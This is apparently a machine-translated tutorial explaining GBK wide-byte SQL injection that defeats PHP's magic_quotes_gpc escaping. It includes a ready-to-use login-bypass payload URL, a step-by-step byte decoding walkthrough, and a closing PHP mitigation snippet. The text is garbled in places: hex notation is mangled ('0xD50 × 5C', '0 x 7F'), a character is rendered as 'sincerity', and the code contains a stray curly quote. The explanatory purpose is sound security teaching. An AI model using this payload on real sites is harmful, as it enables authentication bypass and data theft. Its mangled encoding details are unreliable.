In the case of magic_quotes_gpc = On, if the submitted parameter contains single quotation marks, it will be automatically escaped \ ', making many injection attacks invalid,
GBK dual-byte encoding: a Chinese character is expressed in two bytes. The first byte corresponds to 0x81-0xFE, And the last byte corresponds to 0x40-0xFE (except 0 x 7F ), it just covers the Escape Character \ Corresponding encoding 0 × 5C.
0xD50 × 5C corresponds to the Chinese character "sincerity". The URL encoding uses the hexadecimal notation of the percent sign and the character, so % d5 % 5c is "sincerity" after URL Decoding ".
The following describes the attack process:
Accessing http://www.2cto.com/test. php? Username = test % d5 '% 20or % 201 = 1% 23 & pwd = test
Browser-encoded username parameter value: (single quotation mark encoding: 0 × 27)
Username = test % d5 % 27% 20or % 201 = 1% 23
Php url Decoding
Username = test 0xd5 0x27 0x20 or 0x20 1 = 1 0x23 (for ease of reading, a space is added between the string and hexadecimal encoding)
Automatically escaped by the GPC in PHP (0 × 27 single quotes are converted to \ 'corresponding encoding 0 × 5c0 × 27 ):
Username = test 0xd5 0 x 5c 0x27 0x20 or 0x20 1 = 1 0x23
Set names 'gbk' during database initialization, 0xd50 × 5c after decoding, 0 × 27 After decoding, and 0 × 20 as space, 0 × 23 is the mysql annotator #
The preceding SQL statement is: SELECT * FROM user WHERE username = 'test cheng' or 1 = 1 # 'and password = 'test ';
Annotator # The string following it is invalid. It is equivalent
SELECT * FROM user WHERE username = 'test cheng' or 1 = 1;
The condition becomes permanent, and the injection is successful.
Supplement:
0xD50 × 5C is not the only character that can be escaped without single quotation marks. It should be applicable to the characters starting with 0 × 81-0xFE + 0 × 5C;
There is no such problem according to the encoding range of utf8;
This transformation can also be applied in xss and other fields, for example, the server is in GBK encoding format.
If ($ this-> server_info ()> '4. 1 ′){
// Mysql_query ("set names 'gbk '");
Mysql_query ("SET character_set_connection = 'gbk', character_set_results = 'gbk', character_set_client = binary ");
}